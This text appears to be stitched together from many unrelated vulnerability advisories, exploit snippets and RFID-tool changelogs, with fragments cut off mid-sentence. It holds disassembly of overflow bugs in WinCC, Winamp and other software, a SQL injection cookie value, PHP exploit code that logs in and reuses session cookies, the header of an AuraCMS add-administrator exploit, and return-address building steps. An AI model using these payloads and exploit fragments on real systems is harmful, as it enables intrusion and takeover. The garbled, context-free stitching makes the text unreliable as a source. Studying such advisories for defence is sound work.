Classical heap overflow during the handling of the IVR files caused by
the allocation of a certain amount of data (frame size) decided by the
attacker and the copying of another arbitrary amount on the same
buffer.
From rvrender.dll (base address 63AE0000):
63AF5C70 /$ 55 PUSH EBP
63AF5C71 |. 8BEC MOV EBP,ESP
63AF5C73 |. 83EC 20 SUB ESP,20
63AF5C76 |. 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
Application: Siemens SIMATIC WinCC flexible (Runtime)
http://www.automation.siemens.com/mcms/human-machine-interface/en/visualization-software/wincc-flexible/wincc-flexible-runtime/Pages/Default.aspx
Versions: 2008 SP2 + security patch 1
Platforms: Windows
Bugs: A] HmiLoad strings stack overflow
B] HmiLoad directory traversal
C] HmiLoad various Denials of Service
D] miniweb directory traversal
E] miniweb arbitrary memory read access
Exploitation: remote
Date: 28 Nov 2011
progress, but has some goodies that make it worth releasing now...
From CHANGES:
v0.u - November 2008
add testlahf.sh script for testing LAHF units
fix -R reader type override in RFIDIOtconfig.py
add RFIDIOtconfig.py checking for global overrides in one of the
following locations (in search order):
$(RFIDIOtconfig_opts)
..
10A05C30 55 push ebp
10A05C31 8BEC mov ebp, esp
10A05C33 83EC 10 sub esp, 10
10A05C36 8B45 08 mov eax, dword ptr ss:[ebp+8]
10A05C39 0345 0C add eax, dword ptr ss:[ebp+C]
10A05C3C 8945 F8 mov dword ptr ss:[ebp-8], eax
10A05C3F 8B4D 0C mov ecx, dword ptr ss:[ebp+C]
10A05C42 894D F4 mov dword ptr ss:[ebp-C], ecx
10A05C45 8B55 F4 mov edx, dword ptr ss:[ebp-C]
10A05C48 83EA 01 sub edx, 1
certain M3U file. Winamp allocates memory on each iteration, which
leads to a stack overflow exception (0xc00000fd).
You can test this bug yourself by creating a file named
'a.m3u' with the content 'a.m3u'. If you are using the standard version
of Winamp (not the Lite version), you only have to add the M3U file to
Winamp, for example by simply dragging the file into the playlist.
The Lite version catches the exception and exits if you add the
malformed M3U file to the playlist. If you use the "Enqueue in Winamp"
option (if configured, you'll find it in the context menu), Winamp Lite
Documents'
More detail from the CHANGES file:
v0.t
add WRITE function to mrpkey.py for vonJeek JCOP emulator
(http://freeworld.thc.org/thc-epassport/)
add Makefile and vonJeek.gpsh for installing vonJeek epassport.cap to JCOP
add VONJEEK declarations for vonJeek emulator to RFIDIOt.py
set mrpkey file types to binary for windows compatibility [Jeroen van
Beek / vonJeek <vonjeek@thc.org>]
0603AD86 |. 8B97 A8000000 ||MOV EDX,DWORD PTR DS:[EDI+A8] ; EDX = pointer to destination array
0603AD8C |. 0FB7C0 ||MOVZX EAX,AX ; AX = words starting at offset 0x6F49F (user-controlled)
0603AD8F |. 83C4 04 ||ADD ESP,4
0603AD92 |. 6BC0 5C ||IMUL EAX,EAX,5C
0603AD95 |. 8D4C24 18 ||LEA ECX,DWORD PTR SS:[ESP+18]
0603AD99 |. 8D5410 04 ||LEA EDX,DWORD PTR DS:[EAX+EDX+4] ; calculates the index of the array where it will write, using user-controlled data
1.-WITHOUT ENCRYPTION:
Add cookie --> Name ~> dogarchive_user_info
--> Value ~> email=&uid=-1%20or%201=1#&seclev=
2.-WITH ENCRYPTION:
Affected Software: CMS Made Simple (version <= 1.7.1)
2. Technical details
The XSS vulnerability is found in the following modules:
- Add Pages
- Add Global Content
- Edit Global Content
- Add Article
- Add Category
- Add Field Definition
This issue did not occur on Windows XP.
Installation of Service Pack 1 and/or security updates did not resolve the random crashes.
To execute either the sample program or the route-add command, the user has to be a member of the Network Configuration Operators group or the Administrators group.
Since this buffer overflow overwrites kernel memory, members of the Network Configuration Operators group could potentially exploit it to take full control of the operating system without any restriction.
Impact
-----------------------------
The vulnerability is triggered in ntdll.dll. The code corresponds to the
function RtlAllocateHeap when a new node is added to the double-linked
list of heap chunks. As can be seen, both EAX and ECX contain arbitrary
values controlled by the attacker (0x41414141). This is the Call Stack
when the crash occurs:
- Secure/Stable code base
- Web Based admin Panel
- Supports PayPal, AuthorizeNet, Real time credit card processing
- Supports UPS, USPS and Fed X shipping
- Unlimited product Specials
- Separate customer groups (Retail, Wholesale, or add your own groups)
- Compatible with most other mods available for osCommerce
(Copy of the Vendor Homepage: http://www.oscmax.com/)
> .text:0106689E movzx eax, word ptr [esi+8]
> .text:010668A2 push eax
> .text:010668A3 shl edi, 4
> .text:010668A6 call HexToNum
> .text:010668AB or edi, eax
> .text:010668AD add esi, 0Ah ; account for number of bytes (not chars) consumed by the escape.
> .text:010668B0 jmp short FinishedEscape
> .text:010668B2
> .text:010668B2 NotUnicode:
> .text:010668B2 call HexToNum ; this is the same code, but for non-unicode sequences (e.g. %41, instead of %u0041)
> .text:010668B7 mov edi, eax
To do that first we set ecx to a portion of memory which *always* (or nearly) keeps
the filename.
Look 0x01050000... no null char allowed, so I will use 0x01050101 to hit the right
offset.
To build it we need an address which points to a known call edi, compatible with
windows filenames. To achieve that you may do so:
x@pyro ~/framework-2.2/tools
$ memdump (pid) jetcast
x@pyro ~/framework-2.2/tools
$ cd ..
(http://www.snapper.co.nz/index.html). I've also done a lot of tidying
up of the Mifare key handling code (the KeyA and KeyB stuff was probably
some of the earliest code I wrote on this project, and was pretty
broken!), as I'm starting to see a lot of live security issues with
Mifare cards and their use in applications such as hotel keys etc., so
I've added copy/clone functionality to readmifaresimple.py (note that
it's not capable of creating a true clone as we can't set the UID, but
we can copy all data blocks and set keys).
From CHANGES:
This exception may be expected and handled.
eax=0946fb98 ebx=00000040 ecx=10101010 edx=0946fb90 esi=0946eaea edi=01c1dfbc
eip=10101010 esp=0012f6cc ebp=0012f77c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
exlang32+0x101010:
10101010 001b add byte ptr [ebx],bl ds:0023:00000040=??
0:000> u eip
exlang32+0x101010:
10101010 001b add byte ptr [ebx],bl
10101012 6c ins byte ptr es:[edi],dx
10101013 0000 add byte ptr [eax],al
$s = $xpl->post($url."/index.php?","sql_pseudo=$login&sql_pass=$pass");
//Cookies
if(preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i",$s,$phpsessid) && !preg_match("#name=\"sql_pseudo\"#i",$s)){
$xpl->addcookie("PHPSESSID",$phpsessid[1]);
$xpl->addcookie("sql_pseudo",$login);
$xpl->addcookie("sql_pass",md5($pass));
$xpl->addcookie("auto","off");
print "[*] PHPSESSID : $phpsessid[1]\n";
}
here.
.text:00406077 191A8 68+ push 19000h
; size_t
.text:0040607C 191AC FF+ call ds:__imp_malloc
.text:00406082 191AC 83+ add esp, 10h
.text:00406085 1919C 89+ mov [edi+14h], eax
.text:00406088 1919C 85+ test eax, eax
.text:0040608A 1919C 0F+ jz loc_406238
Once allocated data is read in 0x19000 chunks. If more than 0x4000
Hi,
One of the biggest problems with IOS exploitation is that on every
different version of IOS, the addresses required to execute useful
shellcode are different. Therefore, hard-coded addresses were inserted
into shellcode and this made exploits very version-dependent.
I have been working on a way around this and here is the first
iteration of just one of the solutions to the problem. It uses a
search routine to locate 4-byte signatures that occur near references
yourself in python, this was it... :)
From CHANGES:
v0.r
add SCM Microsystems reader support
add -d (debug) option
switch to T=1 protocol for PC/SC
add auto-detect of PC/SC reader types
fix minor reporting issues in readmifaresimple.py
fix setting of tag type 'ALL' on ACG readers (different for LF or HF)
$ip = $_SERVER[ 'HTTP_CLIENT_IP' ];
}
else if ( !empty ( $_SERVER[ 'HTTP_X_FORWARDED_FOR' ] ) ) {
$ip = $_SERVER[ 'HTTP_X_FORWARDED_FOR' ];
}
else if ( !empty ( $_SERVER[ 'REMOTE_ADDR' ] ) ) {
$ip = $_SERVER[ 'REMOTE_ADDR' ];
}
else if ( getenv( "HTTP_CLIENT_IP" ) ) {
$ip = getenv( "HTTP_CLIENT_IP" );
}
Not a huge amount in this update, but I'm gonna be on the road for a
couple of weeks so I thought I'd better get it out:
fix asn1 field length calculation in mrpkey.py
add human readable config block for Q5 in readlfx.py
add Manchester encoding to RFIDIOt.py and unique.py
add serial port opening and baud rate checking for ACG / Frosch in
RFIDIOt.py
add Q5 emulation detection in lfxtype.py
#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# AuraCMS 2.x (user.php) - Security Code Bypass & Add Administrator Exploit
# Time : Feb 28 2008 08:00PM
# Software : AuraCMS
# Version : 2.0
# 2.1
# 2.2.1
Some days ago I discovered a DoS in Windows Vista. Here is the advisory with a detailed description of the vulnerability that will help Microsoft (they have already been notified about the bug) to correct it as soon as possible, and it will help you if you need to add any rule to your firewall.
Vulnerability and Exploit: Javier Vicente Vallejo, http://www.vallejo.cc
Vulnerability Analysis: Ruben Santamarta, http://www.reversemode.com
Abstract
Microsoft Windows is prone to a remote Kernel Denial of Service due to the way srv.sys handles malformed WRITE_ANDX SMB packets.
Remote attackers could exploit this issue without having valid credentials on the target machine. In order to achieve a successful exploitation, the attacker needs enough privileges to remotely send WRITE_ANDX packets to an interface that uses a Named Pipe as endpoint. Those interfaces that allow NULL Sessions vary between Windows versions, in Vista the reliability of a preauth attack through the “\LSARPC” has been successfully demonstrated.
From CHANGES:
v0.s
fix -L issue in RFIDIOtconfig (readernum must be 0)
add human readable dump to readmifaresimple.py (ReadablePrint() in
RFIDIOt)
fix logic in tag selection in unique.py (would not use hitag2)
add hitag2 login (password mode) to RFIDIOt.py
add hitag2bruteforce program hitag2brute.py
start migrating definitions into smaller files to aid sharing with
connect to a "known" port.
Please consult your security advisors for the best way to protect your
systems.
We are investigating additional solutions to address this vulnerability
and will notify users of any further precautions which may be taken for
additional protection."
*Credits*
Background
==========
"iTunes is a proprietary digital media player application, used for playing and
organizing digital music and video files. The program is also an interface to
manage the contents on Apple's popular iPod and other digital media players
such as the iPhone and iPad. Additionally, iTunes can connect to the iTunes
Store via the Internet to purchase and download music, music videos, television
shows, applications, iPod games, audiobooks, podcasts, feature length films and
movie rentals (not available in all countries), and ringtones (only used for
iPhone). It is also used to download applications for the iPhone and iPod touch
running iPhone OS 2.0 or later." [3]
Administrator Features:
- (NEW) New administrator skin
- (NEW) New server settings (Edit server settings, server rates, specs etc)
- (NEW) New website settings (Title, Note from the management, Contact Email, Rankings Limit)
- (NEW) Ads Management (Add, Edit & Delete)
- News management (add, edit & delete)
- Download management (add, edit & delete)
- Login
- Add administrator
- Logout (of course)